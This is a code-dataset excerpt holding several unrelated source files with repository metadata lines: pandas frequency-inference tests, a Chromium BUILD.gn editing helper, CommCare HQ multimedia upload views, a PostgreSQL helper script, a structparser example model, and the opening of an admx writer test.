assert result == rng.inferred_freq
def test_invalid_index_types(self):
# test all index types
for i in [tm.makeIntIndex(10), tm.makeFloatIndex(10),
tm.makePeriodIndex(10)]:
pytest.raises(TypeError, lambda: frequencies.infer_freq(i))
# GH 10822
# odd error message on conversions to datetime for unicode
if not is_platform_windows():
for i in [tm.makeStringIndex(10), tm.makeUnicodeIndex(10)]:
pytest.raises(ValueError, lambda: frequencies.infer_freq(i))
def test_string_datetimelike_compat(self):
# GH 6463
expected = frequencies.infer_freq(['2004-01', '2004-02', '2004-03',
'2004-04'])
result = frequencies.infer_freq(Index(['2004-01', '2004-02', '2004-03',
'2004-04']))
assert result == expected
def test_series(self):
# GH6407
# inferring series
# invalid type of Series
for s in [Series(np.arange(10)), Series(np.arange(10.))]:
pytest.raises(TypeError, lambda: frequencies.infer_freq(s))
# a non-convertible string
pytest.raises(ValueError, lambda: frequencies.infer_freq(
Series(['foo', 'bar'])))
# cannot infer on PeriodIndex
for freq in [None, 'L']:
s = Series(period_range('2013', periods=10, freq=freq))
pytest.raises(TypeError, lambda: frequencies.infer_freq(s))
# DateTimeIndex
for freq in ['M', 'L', 'S']:
s = Series(date_range('20130101', periods=10, freq=freq))
inferred = frequencies.infer_freq(s)
assert inferred == freq
s = Series(date_range('20130101', '20130110'))
inferred = frequencies.infer_freq(s)
assert inferred == 'D'
def test_legacy_offset_warnings(self):
freqs = ['WEEKDAY', 'EOM', 'W@MON', 'W@TUE', 'W@WED', 'W@THU',
'W@FRI', 'W@SAT', 'W@SUN', 'Q@JAN', 'Q@FEB', 'Q@MAR',
'A@JAN', 'A@FEB', 'A@MAR', 'A@APR', 'A@MAY', 'A@JUN',
'A@JUL', 'A@AUG', 'A@SEP', 'A@OCT', 'A@NOV', 'A@DEC',
'Y@JAN', 'WOM@1MON', 'WOM@2MON', 'WOM@3MON',
'WOM@4MON', 'WOM@1TUE', 'WOM@2TUE', 'WOM@3TUE',
'WOM@4TUE', 'WOM@1WED', 'WOM@2WED', 'WOM@3WED',
'WOM@4WED', 'WOM@1THU', 'WOM@2THU', 'WOM@3THU',
'WOM@4THU', 'WOM@1FRI', 'WOM@2FRI', 'WOM@3FRI',
'WOM@4FRI']
msg = INVALID_FREQ_ERR_MSG
for freq in freqs:
with pytest.raises(ValueError, match=msg):
frequencies.get_offset(freq)
with pytest.raises(ValueError, match=msg):
date_range('2011-01-01', periods=5, freq=freq)
| bsd-3-clause | 8,207,404,789,403,593,000 | 36.432535 | 79 | 0.55289 | false |
chromium/chromium | tools/android/modularization/convenience/build_gn_editor.py | 6 | 10119 | # Lint as: python3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
r'''Helper code to handle editing BUILD.gn files.'''
from __future__ import annotations
import difflib
import pathlib
import re
import subprocess
from typing import List, Optional, Tuple
def _find_block(source: str, start: int, open_delim: str,
close_delim: str) -> Tuple[int, int]:
open_delim_pos = source[start:].find(open_delim)
if open_delim_pos < 0:
return (-1, -1)
baseline = start + open_delim_pos
delim_count = 1
for i, char in enumerate(source[baseline + 1:]):
if char == open_delim:
delim_count += 1
continue
if char == close_delim:
delim_count -= 1
if delim_count == 0:
return (baseline, baseline + i + 1)
return (baseline, -1)
def _find_line_end(source: str, start: int) -> int:
pos = source[start:].find('\n')
if pos < 0:
return -1
return start + pos
class BuildFileUpdateError(Exception):
"""Represents an error updating the build file."""
def __init__(self, message: str):
super().__init__()
self._message = message
def __str__(self):
return self._message
class VariableContentList(object):
"""Contains the elements of a list assigned to a variable in a gn target.
Example:
target_type("target_name") {
foo = [
"a",
"b",
"c",
]
}
This class represents the elements "a", "b", "c" for foo.
"""
def __init__(self):
self._elements = []
def parse_from(self, content: str) -> bool:
"""Parses list elements from content and returns True on success.
The expected list format must be a valid gn list. i.e.
1. []
2. [ "foo" ]
3. [
"foo",
"bar",
...
]
"""
start = content.find('[')
if start < 0:
return False
end = start + content[start:].find(']')
if end <= start:
return False
bracketless_content = content[start + 1:end].strip()
if not bracketless_content:
return True
whitespace = re.compile(r'^\s+', re.MULTILINE)
comma = re.compile(r',$', re.MULTILINE)
self._elements = list(
dict.fromkeys(
re.sub(comma, '', re.sub(whitespace, '',
bracketless_content)).split('\n')))
return True
def get_elements(self) -> List[str]:
return self._elements
def add_elements(self, elements: List[str]) -> None:
"""Appends unique elements to the existing list."""
if not self._elements:
self._elements = list(dict.fromkeys(elements))
return
all_elements = list(self._elements)
all_elements.extend(elements)
self._elements = list(dict.fromkeys(all_elements))
def add_list(self, other: VariableContentList) -> None:
"""Appends unique elements to the existing list."""
self.add_elements(other.get_elements())
def serialize(self) -> str:
if not self._elements:
return '[]\n'
return '[\n' + ',\n'.join(self._elements) + ',\n]'
class TargetVariable:
"""Contains the name of a variable and its contents in a gn target.
Example:
target_type("target_name") {
variable_name = variable_content
}
This class represents the variable_name and variable_content.
"""
def __init__(self, name: str, content: str):
self._name = name
self._content = content
def get_name(self) -> str:
return self._name
def get_content(self) -> str:
return self._content
def get_content_as_list(self) -> Optional[VariableContentList]:
"""Returns the variable's content if it can be represented as a list."""
content_list = VariableContentList()
if content_list.parse_from(self._content):
return content_list
return None
def is_list(self) -> bool:
"""Returns whether the variable's content is represented as a list."""
return self.get_content_as_list() is not None
def set_content_from_list(self, content_list: VariableContentList) -> None:
self._content = content_list.serialize()
def set_content(self, content: str) -> None:
self._content = content
def serialize(self) -> str:
return f'\n{self._name} = {self._content}\n'
class BuildTarget:
"""Contains the target name, type and content of a gn target.
Example:
target_type("target_name") {
<content>
}
This class represents target_type, target_name and arbitrary content.
Specific variables are accessible via this class by name although only the
basic 'foo = "bar"' and
'foo = [
"bar",
"baz",
]'
formats are supported, not more complex things like += or conditionals.
"""
def __init__(self, target_type: str, target_name: str, content: str):
self._target_type = target_type
self._target_name = target_name
self._content = content
def get_name(self) -> str:
return self._target_name
def get_type(self) -> str:
return self._target_type
def get_variable(self, variable_name: str) -> Optional[TargetVariable]:
pattern = re.compile(fr'^\s*{variable_name} = ', re.MULTILINE)
match = pattern.search(self._content)
if not match:
return None
start = match.end() - 1
end = start
if self._content[match.end()] == '[':
start, end = _find_block(self._content, start, '[', ']')
else:
end = _find_line_end(self._content, start)
if end <= start:
return None
return TargetVariable(variable_name, self._content[start:end + 1])
def add_variable(self, variable: TargetVariable) -> None:
"""Adds the variable to the end of the content.
Warning: this does not check for prior existence."""
self._content += variable.serialize()
def replace_variable(self, variable: TargetVariable) -> None:
"""Replaces an existing variable and returns True on success."""
pattern = re.compile(fr'^\s*{variable.get_name()} =', re.MULTILINE)
match = pattern.search(self._content)
if not match:
raise BuildFileUpdateError(
f'{self._target_type}("{self._target_name}") variable '
f'{variable.get_name()} not found. Unable to replace.')
start = match.end()
if variable.is_list():
start, end = _find_block(self._content, start, '[', ']')
else:
end = _find_line_end(self._content, start)
if end <= match.start():
raise BuildFileUpdateError(
f'{self._target_type}("{self._target_name}") variable '
f'{variable.get_name()} invalid. Unable to replace.')
self._content = (self._content[:match.start()] + variable.serialize() +
self._content[end + 1:])
def serialize(self) -> str:
return (f'\n{self._target_type}("{self._target_name}") {{\n' +
f'{self._content}\n}}\n')
class BuildFile:
"""Represents the contents of a BUILD.gn file.
This supports modifying or adding targets to the file at a basic level.
"""
def __init__(self, build_gn_path: pathlib.Path):
self._path = build_gn_path
with open(self._path, 'r') as build_gn_file:
self._content = build_gn_file.read()
def get_target_names_of_type(self, target_type: str) -> List[str]:
"""Lists all targets in the build file of target_type."""
pattern = re.compile(fr'^\s*{target_type}\(\"(\w+)\"\)', re.MULTILINE)
return pattern.findall(self._content)
def get_target(self, target_type: str,
target_name: str) -> Optional[BuildTarget]:
pattern = re.compile(fr'^\s*{target_type}\(\"{target_name}\"\)',
re.MULTILINE)
match = pattern.search(self._content)
if not match:
return None
start, end = _find_block(self._content, match.end(), '{', '}')
if end <= start:
return None
return BuildTarget(target_type, target_name, self._content[start + 1:end])
def get_path(self) -> pathlib.Path:
return self._path
def get_content(self) -> str:
return self._content
def get_diff(self) -> str:
with open(self._path, 'r') as build_gn_file:
disk_content = build_gn_file.read()
return ''.join(
difflib.unified_diff(disk_content.splitlines(keepends=True),
self._content.splitlines(keepends=True),
fromfile=f'{self._path}',
tofile=f'{self._path}'))
def add_target(self, target: BuildTarget) -> None:
"""Adds the target to the end of the content.
Warning: this does not check for prior existence."""
self._content += target.serialize()
def replace_target(self, target: BuildTarget) -> None:
"""Replaces an existing target and returns True on success."""
pattern = re.compile(fr'^\s*{target.get_type()}\(\"{target.get_name()}\"\)',
re.MULTILINE)
match = pattern.search(self._content)
if not match:
raise BuildFileUpdateError(
f'{target.get_type()}("{target.get_name()}") not found. '
'Unable to replace.')
start, end = _find_block(self._content, match.end(), '{', '}')
if end <= start:
raise BuildFileUpdateError(
f'{target.get_type()}("{target.get_name()}") invalid. '
'Unable to replace.')
self._content = (self._content[:match.start()] + target.serialize() +
self._content[end + 1:])
def format_content(self) -> None:
process = subprocess.Popen(['gn', 'format', '--stdin'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout_data, stderr_data = process.communicate(input=self._content.encode())
if process.returncode:
raise BuildFileUpdateError(
'Formatting failed. There was likely an error in the changes '
'(this program cannot handle complex BUILD.gn files).\n'
f'stderr: {stderr_data.decode()}')
self._content = stdout_data.decode()
def write_content_to_file(self) -> None:
with open(self._path, 'w+') as build_gn_file:
build_gn_file.write(self._content)
| bsd-3-clause | 719,191,919,956,314,500 | 29.20597 | 80 | 0.612709 | false |
qedsoftware/commcare-hq | corehq/apps/hqmedia/views.py | 1 | 22884 | from StringIO import StringIO
from mimetypes import guess_all_extensions, guess_type
import uuid
import zipfile
import logging
import os
from django.contrib.auth.decorators import login_required
import json
import itertools
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import View, TemplateView
from couchdbkit.exceptions import ResourceNotFound
from django.http import HttpResponse, Http404, HttpResponseServerError, HttpResponseBadRequest
from django.shortcuts import render
import shutil
from corehq import privileges
from corehq.util.files import file_extention_from_filename
from soil import DownloadBase
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.decorators import safe_download
from corehq.apps.app_manager.view_helpers import ApplicationViewMixin
from corehq.apps.hqmedia.cache import BulkMultimediaStatusCache, BulkMultimediaStatusCacheNfs
from corehq.apps.hqmedia.controller import (
MultimediaBulkUploadController,
MultimediaImageUploadController,
MultimediaAudioUploadController,
MultimediaVideoUploadController
)
from corehq.apps.hqmedia.decorators import login_with_permission_from_post
from corehq.apps.hqmedia.models import CommCareImage, CommCareAudio, CommCareMultimedia, MULTIMEDIA_PREFIX, CommCareVideo
from corehq.apps.hqmedia.tasks import process_bulk_upload_zip, build_application_zip
from corehq.apps.users.decorators import require_permission
from corehq.apps.users.models import Permissions
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.django.cached_object import CachedObject
from soil.util import expose_cached_download
from django.utils.translation import ugettext as _
from django_prbac.decorators import requires_privilege_raise404
class BaseMultimediaView(ApplicationViewMixin, View):
@method_decorator(require_permission(Permissions.edit_apps, login_decorator=login_with_permission_from_post()))
def dispatch(self, request, *args, **kwargs):
return super(BaseMultimediaView, self).dispatch(request, *args, **kwargs)
class BaseMultimediaTemplateView(BaseMultimediaView, TemplateView):
"""
The base view for all the multimedia templates.
"""
@property
def page_context(self):
return {}
def get_context_data(self, **kwargs):
context = {
"domain": self.domain,
"app": self.app,
}
context.update(self.page_context)
return context
def render_to_response(self, context, **response_kwargs):
return render(self.request, self.template_name, context)
class BaseMultimediaUploaderView(BaseMultimediaTemplateView):
@property
def page_context(self):
return {
'uploaders': self.upload_controllers,
"sessionid": self.request.COOKIES.get('sessionid'),
}
@property
def upload_controllers(self):
"""
Return a list of Upload Controllers
"""
raise NotImplementedError("You must specify a list of upload controllers")
class MultimediaReferencesView(BaseMultimediaUploaderView):
name = "hqmedia_references"
template_name = "hqmedia/references.html"
@property
def page_context(self):
context = super(MultimediaReferencesView, self).page_context
if self.app is None:
raise Http404(self)
context.update({
"references": self.app.get_references(),
"object_map": self.app.get_object_map(),
"totals": self.app.get_reference_totals(),
"sessionid": self.request.COOKIES.get('sessionid'),
})
return context
@property
def upload_controllers(self):
return [
MultimediaImageUploadController("hqimage", reverse(ProcessImageFileUploadView.name,
args=[self.domain, self.app_id])),
MultimediaAudioUploadController("hqaudio", reverse(ProcessAudioFileUploadView.name,
args=[self.domain, self.app_id])),
MultimediaVideoUploadController("hqvideo", reverse(ProcessVideoFileUploadView.name,
args=[self.domain, self.app_id])),
]
class BulkUploadMultimediaView(BaseMultimediaUploaderView):
name = "hqmedia_bulk_upload"
template_name = "hqmedia/bulk_upload.html"
@property
def upload_controllers(self):
return [MultimediaBulkUploadController("hqmedia_bulk", reverse(ProcessBulkUploadView.name,
args=[self.domain, self.app_id]))]
class BadMediaFileException(Exception):
pass
class BaseProcessUploadedView(BaseMultimediaView):
@property
def username(self):
return self.request.couch_user.username if self.request.couch_user else None
@property
def share_media(self):
return self.request.POST.get('shared') == 't'
@property
def license_used(self):
return self.request.POST.get('license', '')
@property
def author(self):
return self.request.POST.get('author', '')
@property
def attribution_notes(self):
return self.request.POST.get('attribution-notes', '')
@property
@memoized
def uploaded_file(self):
return self.request.FILES.get('Filedata')
@property
@memoized
def mime_type(self):
try:
data = self.uploaded_file.file.read()
return CommCareMultimedia.get_mime_type(data, filename=self.uploaded_file.name)
except Exception as e:
raise BadMediaFileException("There was an error fetching the MIME type of your file. Error: %s" % e)
@method_decorator(require_permission(Permissions.edit_apps, login_decorator=login_with_permission_from_post()))
# YUI js uploader library doesn't support csrf
@csrf_exempt
def dispatch(self, request, *args, **kwargs):
return super(BaseMultimediaView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return HttpResponseBadRequest("You may only post to this URL.")
def post(self, request, *args, **kwargs):
self.errors = []
response = {}
try:
self.validate_file()
response.update(self.process_upload())
except BadMediaFileException as e:
self.errors.append(e.message)
response.update({
'errors': self.errors,
})
return HttpResponse(json.dumps(response))
def validate_file(self, replace_diff_ext=False):
raise NotImplementedError("You must validate your uploaded file!")
def process_upload(self):
raise NotImplementedError("You definitely need to implement this guy.")
class ProcessBulkUploadView(BaseProcessUploadedView):
name = "hqmedia_uploader_bulk"
@property
@memoized
def uploaded_zip(self):
try:
self.uploaded_file.file.seek(0)
return zipfile.ZipFile(self.uploaded_file)
except Exception as e:
raise BadMediaFileException("There was an issue processing the zip file you provided. Error: %s" % e)
def validate_file(self, replace_diff_ext=False):
if not self.mime_type in self.valid_mime_types():
raise BadMediaFileException("Your zip file doesn't have a valid mimetype.")
if not self.uploaded_zip:
raise BadMediaFileException("There is no ZIP file.")
if self.uploaded_zip.testzip():
raise BadMediaFileException("The ZIP file provided was bad.")
def process_upload(self):
if hasattr(self.uploaded_file, 'temporary_file_path') and settings.SHARED_DRIVE_CONF.temp_dir:
processing_id = uuid.uuid4().hex
path = settings.SHARED_DRIVE_CONF.get_temp_file(suffix='.upload')
shutil.move(self.uploaded_file.temporary_file_path(), path)
status = BulkMultimediaStatusCacheNfs(processing_id, path)
status.save()
else:
self.uploaded_file.file.seek(0)
saved_file = expose_cached_download(
self.uploaded_file.file.read(),
expiry=BulkMultimediaStatusCache.cache_expiry,
file_extension=file_extention_from_filename(self.uploaded_file.name),
)
processing_id = saved_file.download_id
status = BulkMultimediaStatusCache(processing_id)
status.save()
process_bulk_upload_zip.delay(processing_id, self.domain, self.app_id,
username=self.username,
share_media=self.share_media,
license_name=self.license_used,
author=self.author,
attribution_notes=self.attribution_notes)
return status.get_response()
@classmethod
def valid_mime_types(cls):
return [
'application/zip',
'application/x-zip',
'application/octet-stream',
'application/x-zip-compressed',
]
class BaseProcessFileUploadView(BaseProcessUploadedView):
media_class = None
@property
def form_path(self):
return self.request.POST.get('path', '')
@property
def original_path(self):
return self.request.POST.get('originalPath')
@property
def file_ext(self):
def file_ext(filename):
_, extension = os.path.splitext(filename)
return extension
return file_ext(self.uploaded_file.name)
@property
def orig_ext(self):
if self.original_path is None:
return self.file_ext
return '.{}'.format(self.original_path.split('.')[-1])
def validate_file(self, replace_diff_ext=False):
def possible_extensions(filename):
possible_type = guess_type(filename)[0]
if not possible_type:
return []
return guess_all_extensions(guess_type(filename)[0])
if not self.mime_type:
raise BadMediaFileException(_("Did not process a mime type!"))
base_type = self.mime_type.split('/')[0]
if base_type not in self.valid_base_types():
raise BadMediaFileException(
_("Not a valid %s file.")
% self.media_class.get_nice_name().lower()
)
if self.file_ext.lower() not in possible_extensions(self.form_path):
raise BadMediaFileException(
_("File {name} has an incorrect file type {ext}.").format(
name=self.uploaded_file.name,
ext=self.file_ext,
)
)
if not replace_diff_ext and self.file_ext.lower() != self.orig_ext.lower():
raise BadMediaFileException(_(
"The file type of {name} of '{ext}' does not match the "
"file type of the original media file '{orig_ext}'. To change "
"file types, please upload directly from the "
"Form Builder."
).format(
name=self.uploaded_file.name,
ext=self.file_ext.lower(),
orig_ext=self.orig_ext.lower(),
))
def process_upload(self):
self.uploaded_file.file.seek(0)
self.data = self.uploaded_file.file.read()
multimedia = self.media_class.get_by_data(self.data)
multimedia.attach_data(self.data,
original_filename=self.uploaded_file.name,
username=self.username)
multimedia.add_domain(self.domain, owner=True)
if self.share_media:
multimedia.update_or_add_license(self.domain,
type=self.license_used,
author=self.author,
attribution_notes=self.attribution_notes)
self.app.create_mapping(multimedia, self.form_path)
return {
'ref': multimedia.get_media_info(self.form_path),
}
@classmethod
def valid_base_types(cls):
raise NotImplementedError("You need to specify a list of valid base mime types!")
class ProcessImageFileUploadView(BaseProcessFileUploadView):
media_class = CommCareImage
name = "hqmedia_uploader_image"
@classmethod
def valid_base_types(cls):
return ['image']
class ProcessLogoFileUploadView(ProcessImageFileUploadView):
name = "hqmedia_uploader_logo"
@method_decorator(requires_privilege_raise404(privileges.COMMCARE_LOGO_UPLOADER))
def post(self, request, *args, **kwargs):
return super(ProcessLogoFileUploadView, self).post(request, *args, **kwargs)
@property
def form_path(self):
return ("jr://file/commcare/logo/data/%s%s"
% (self.filename, self.file_ext))
def validate_file(self, replace_diff_ext=True):
return super(ProcessLogoFileUploadView, self).validate_file(replace_diff_ext)
@property
def filename(self):
return self.kwargs.get('logo_name')
def process_upload(self):
if self.app.logo_refs is None:
self.app.logo_refs = {}
ref = super(
ProcessLogoFileUploadView, self
).process_upload()
self.app.logo_refs[self.filename] = ref['ref']
self.app.save()
return ref
class ProcessAudioFileUploadView(BaseProcessFileUploadView):
media_class = CommCareAudio
name = "hqmedia_uploader_audio"
@classmethod
def valid_base_types(cls):
return ['audio']
class ProcessVideoFileUploadView(BaseProcessFileUploadView):
media_class = CommCareVideo
name = "hqmedia_uploader_video"
@classmethod
def valid_base_types(cls):
return ['video']
class ProcessTextFileUploadView(BaseProcessFileUploadView):
media_class = CommCareMultimedia
name = "hqmedia_uploader_text"
@classmethod
def valid_base_types(cls):
return ['text']
class RemoveLogoView(BaseMultimediaView):
name = "hqmedia_remove_logo"
@property
def logo_slug(self):
if self.request.method == 'POST':
return self.request.POST.get('logo_slug')
return None
@method_decorator(requires_privilege_raise404(privileges.COMMCARE_LOGO_UPLOADER))
def post(self, *args, **kwargs):
if self.logo_slug in self.app.logo_refs:
del self.app.logo_refs[self.logo_slug]
self.app.save()
return HttpResponse()
class CheckOnProcessingFile(BaseMultimediaView):
name = "hqmedia_check_processing"
def get(self, request, *args, **kwargs):
return HttpResponse("workin on it")
def iter_media_files(media_objects):
"""
take as input the output of get_media_objects
and return an iterator of (path, data) tuples for the media files
as they should show up in the .zip
as well as a list of error messages
as a side effect of implementation,
errors will not include all error messages until the iterator is exhausted
"""
errors = []
def _media_files():
for path, media in media_objects:
try:
data, _ = media.get_display_file()
folder = path.replace(MULTIMEDIA_PREFIX, "")
if not isinstance(data, unicode):
yield os.path.join(folder), data
except NameError as e:
errors.append("%(path)s produced an ERROR: %(error)s" % {
'path': path,
'error': e,
})
return _media_files(), errors
def iter_app_files(app, include_multimedia_files, include_index_files, build_profile_id=None):
file_iterator = []
errors = []
if include_multimedia_files:
app.remove_unused_mappings()
languages = None
if build_profile_id is not None:
languages = app.build_profiles[build_profile_id].langs
file_iterator, errors = iter_media_files(app.get_media_objects(languages=languages))
if include_index_files:
index_files, index_file_errors = iter_index_files(app, build_profile_id=build_profile_id)
if index_file_errors:
errors.extend(index_file_errors)
file_iterator = itertools.chain(file_iterator, index_files)
return file_iterator, errors
class DownloadMultimediaZip(View, ApplicationViewMixin):
"""
This is where the Multimedia for an application gets generated.
Expects domain and app_id to be in its args
"""
name = "download_multimedia_zip"
compress_zip = False
zip_name = 'commcare.zip'
include_multimedia_files = True
include_index_files = False
def check_before_zipping(self):
if not self.app.multimedia_map and self.include_multimedia_files:
return HttpResponse("You have no multimedia to download.")
def log_errors(self, errors):
logging.error(
"Error downloading multimedia ZIP "
"for domain %s and application %s." % (
self.domain, self.app_id)
)
return HttpResponseServerError(
"Errors were encountered while "
"retrieving media for this application.<br /> %s" % (
"<br />".join(errors))
)
def get(self, request, *args, **kwargs):
assert self.include_multimedia_files or self.include_index_files
error_response = self.check_before_zipping()
if error_response:
return error_response
message = request.GET['message'] if 'message' in request.GET else None
download = DownloadBase(message=message)
build_profile_id = None
if domain_has_privilege(request.domain, privileges.BUILD_PROFILES):
build_profile_id = request.GET.get('profile')
download.set_task(build_application_zip.delay(
include_multimedia_files=self.include_multimedia_files,
include_index_files=self.include_index_files,
app=self.app,
download_id=download.download_id,
compress_zip=self.compress_zip,
filename=self.zip_name,
build_profile_id=build_profile_id)
)
return download.get_start_response()
@method_decorator(safe_download)
def dispatch(self, request, *args, **kwargs):
return super(DownloadMultimediaZip, self).dispatch(request, *args, **kwargs)
class MultimediaUploadStatusView(View):
name = "hqmedia_upload_status"
@property
@memoized
def processing_id(self):
return self.request.POST.get('processing_id')
@method_decorator(login_required)
def dispatch(self, request, *args, **kwargs):
return super(MultimediaUploadStatusView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return HttpResponseBadRequest("Please post to this.")
def post(self, request, *args, **kwargs):
if not self.processing_id:
return HttpResponseBadRequest("A processing_id is required.")
status = BulkMultimediaStatusCache.get(self.processing_id)
if status is None:
# No status could be retrieved from the cache
fake_status = BulkMultimediaStatusCache(self.processing_id)
fake_status.complete = True
fake_status.errors.append(_('There was an issue retrieving the status from the cache. '
'We are looking into it. Please try uploading again.'))
logging.error("[Multimedia Bulk Upload] Process ID #%s encountered an issue while retrieving "
"a status from the cache." % self.processing_id)
response = fake_status.get_response()
else:
response = status.get_response()
return HttpResponse(json.dumps(response))
class ViewMultimediaFile(View):
name = "hqmedia_download"
@property
@memoized
def media_class(self):
media_type = self.kwargs.get('media_type')
try:
return CommCareMultimedia.get_doc_class(media_type)
except KeyError:
raise Http404("Could not find media of that type.")
@property
@memoized
def doc_id(self):
return self.kwargs.get('doc_id')
@property
@memoized
def multimedia(self):
try:
return self.media_class.get(self.doc_id)
except ResourceNotFound:
raise Http404("Media not found.")
@property
@memoized
def thumb(self):
thumb = self.request.GET.get('thumb')
try:
return int(thumb), int(thumb)
except Exception:
return None
def get(self, request, *args, **kwargs):
obj = CachedObject(str(self.doc_id)
+ ':' + self.kwargs.get('media_type')
+ ':' + str(self.thumb))
if not obj.is_cached():
data, content_type = self.multimedia.get_display_file()
if self.thumb:
data = CommCareImage.get_thumbnail_data(data, self.thumb)
buffer = StringIO(data)
metadata = {'content_type': content_type}
obj.cache_put(buffer, metadata, timeout=None)
else:
metadata, buffer = obj.get()
data = buffer.getvalue()
content_type = metadata['content_type']
return HttpResponse(data, content_type=content_type)
def iter_index_files(app, build_profile_id=None):
from corehq.apps.app_manager.views.download import download_index_files
skip_files = ('profile.xml', 'profile.ccpr', 'media_profile.xml')
text_extensions = ('.xml', '.ccpr', '.txt')
files = []
errors = []
def _get_name(f):
return {'media_profile.ccpr': 'profile.ccpr'}.get(f, f)
def _encode_if_unicode(s):
return s.encode('utf-8') if isinstance(s, unicode) else s
def _files(files):
for name, f in files:
if build_profile_id is not None:
name = name.replace(build_profile_id + '/', '')
if name not in skip_files:
# TODO: make RemoteApp.create_all_files not return media files
extension = os.path.splitext(name)[1]
data = _encode_if_unicode(f) if extension in text_extensions else f
yield (_get_name(name), data)
try:
files = download_index_files(app, build_profile_id)
except Exception as e:
errors = [unicode(e)]
return _files(files), errors
| bsd-3-clause | 1,299,744,272,025,321,000 | 34.589425 | 121 | 0.627775 | false |
IntersectAustralia/asvo-tao | core/PerformanceCode/WallTimeResultsMerge.py | 1 | 2770 | import pickle, os, logging,string
import pg
import locale
import time
from datetime import date
import logging
import settingReader
class DBInterface(object):
def __init__(self,Options):
self.Options=Options
self.InitDBConnection(self.Options)
self.IsOpen=False
self.QueriesCount=0
def InitDBConnection(self,Options):
####### PostgreSQL Backend Master DB #################
self.serverip=Options['PGDB:serverip']
self.username=Options['PGDB:user']
self.password=Options['PGDB:password']
self.port=int(Options['PGDB:port'])
self.DBName=Options['PGDB:NewDBName']
self.CurrentConnection=pg.connect(host=self.serverip,user=self.username,passwd=self.password,port=self.port,dbname=self.DBName)
print('Connection to DB is open...')
self.IsOpen=True
def CloseConnections(self):
if self.IsOpen==True:
self.CurrentConnection.close()
print('Connection to DB is Closed...')
self.IsOpen=False
def ExecuteNoQuerySQLStatment(self,SQLStatment):
try:
self.CurrentConnection.query(SQLStatment)
return True
except Exception as Exp:
print(">>>>>Error While Executing Non-Query SQL Statement")
print(type(Exp))
print(Exp.args)
print(Exp)
print("Current SQL Statement =\n"+SQLStatment)
return False
def ExecuteQuerySQLStatment(self,SQLStatment):
try:
resultsList=self.CurrentConnection.query(SQLStatment).getresult()
return resultsList
except Exception as Exp:
print(">>>>>Error While Executing Query SQL Statement")
print(type(Exp))
print(Exp.args)
print(Exp)
print("Current SQL Statement =\n"+SQLStatment)
def ExecuteQuerySQLStatmentAsDict(self,SQLStatment):
try:
resultsList=self.CurrentConnection.query(SQLStatment).dictresult()
return resultsList
except Exception as Exp:
print(">>>>>Error While Executing Query SQL Statement")
print(type(Exp))
print(Exp.args)
print(Exp)
print("Current SQL Statement =\n"+SQLStatment)
if __name__ == '__main__':
[Options]=settingReader.ParseParams("settings.xml")
DBConnectionObj=DBInterface(Options)
DBConnectionObj.CloseConnections() | gpl-3.0 | 8,723,199,746,973,042,000 | 34.075949 | 135 | 0.555596 | false |
simone-campagna/py-structparser | examples/versioning/model/model_r1.py | 1 | 3830 | #
# Copyright 2013 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = 'Simone Campagna'
from structparser.core import *
class FileTypeEnum(EnumType):
"""Enumeration for file types:
* RAW-C: C raw file
* RAW-FORTRAN: FORTRAN raw file
* ASCII: ASCII file
"""
__items__ = ('RAW-C', 'RAW-FORTRAN', 'ASCII')
class FileType(Enum):
"""wraps the FileTypeEnum enumeration"""
__type__ = FileTypeEnum
class Params(Struct):
__fields__ = (
FieldType("alpha",
field_type=Float,
description="the alpha coefficient"),
FieldType("beta",
field_type=Float,
description="the beta coefficient"),
FieldType("order",
field_type=PositiveInt,
default=1,
description="the equation order"),
FieldType("coefficients",
field_type=FloatList(BIND.order + 1),
description="the equation coefficients"),
)
class ParamsSubFile(BaseSubFile):
__subtype__ = Params
class ExperimentalParams(Struct):
__fields__ = (
FieldType("gamma_0",
field_type=Float,
default=0.95,
description="gamma_0 coefficient"),
FieldType("gamma_1",
field_type=Float,
default=-0.95,
description="gamma_1 coefficient"),
FieldType("label",
field_type=Str,
default="exp-0",
description="label"),
)
class Dataset(Struct):
__fields__ = (
FieldType("version",
field_type=Str,
default="r1",
description="version number"),
FieldType("r1",
field_type=Int,
description="r1 value"),
FieldType("num_vars",
field_type=NonNegativeInt,
description="number of variables"),
FieldType("num_tsteps",
field_type=NonNegativeInt,
description="number of time steps"),
FieldType("spacing",
field_type=FloatList(3),
description="x, y, z spacing"),
FieldType("var_names",
field_type=StrList(BIND.num_vars),
description="name of the variables"),
FieldType("tsteps",
field_type=FloatList(BIND.num_tsteps),
description="value of the time steps"),
FieldType("file_type",
field_type=FileType,
default=FileTypeEnum.ASCII,
description="file type: {{{0}}}".format(', '.join(item.label for item in FileTypeEnum))),
FieldType("files",
field_type=PathList(BIND.num_vars * BIND.num_tsteps),
description="var data files"),
FieldType("mix_files",
field_type=PathList(BIND.num_vars ** 2),
description="mix var data files"),
FieldType("experimental_flag",
field_type=Switch,
description="enable experimental mode; it switches on/off the 'experimental_params' section"),
FieldType("experimental_params",
field_type=Switched(ExperimentalParams, BIND.experimental_flag),
description="experimental mode parameters; they all have a default value"),
FieldType("params_file",
field_type=ParamsSubFile,
description="parameters file"),
)
| apache-2.0 | -2,636,145,637,851,915,000 | 32.596491 | 106 | 0.597389 | false |
endlessm/chromium-browser | components/policy/tools/template_writers/writers/admx_writer_unittest.py | 3 | 25665 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for writers.admx_writer."""
import os
import sys
import unittest
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../..'))
from writers import admx_writer
from writers import xml_writer_base_unittest
from xml.dom import minidom
